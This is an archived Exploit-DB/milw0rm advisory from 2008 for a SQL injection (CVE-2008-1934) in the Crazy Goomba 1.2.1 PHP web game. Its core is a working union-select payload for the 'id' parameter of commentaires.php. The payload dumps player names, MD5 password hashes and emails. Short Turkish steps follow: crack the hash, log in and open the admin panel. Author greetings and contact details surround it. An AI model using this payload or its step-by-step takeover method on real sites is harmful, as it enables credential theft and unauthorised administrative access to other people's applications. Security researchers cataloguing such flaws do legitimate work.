Crazy Goomba 1.2.1 id Remote SQL Injection Vulnerability

2008-04-21T00:00:00
ID EDB-ID:5481
Type exploitdb
Reporter ZoRLu
Modified 2008-04-21T00:00:00

Description

Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability. CVE-2008-1934. Webapps exploit for php platform

                                        
                                            ##########CANAKKALE GECiLMEZ##############################

Crazy Goomba 1.2.1 SQL inj

dork:  :((  sory

author: ZoRLu 

home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )

Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da  :((

Not: http://www.z0rlu.ownspace.org   acIklarýn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

###################CANAKKALE GECiLMEZ###################

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]


[SQL]


1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )

md5 i kýr ve giris yap

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion  ( login )


sonra admin panele baglan


admin panel: 


http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php



###################CANAKKALE GECiLMEZ####################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti  :(((

###################CANAKKALE GECiLMEZ####################

# milw0rm.com [2008-04-21]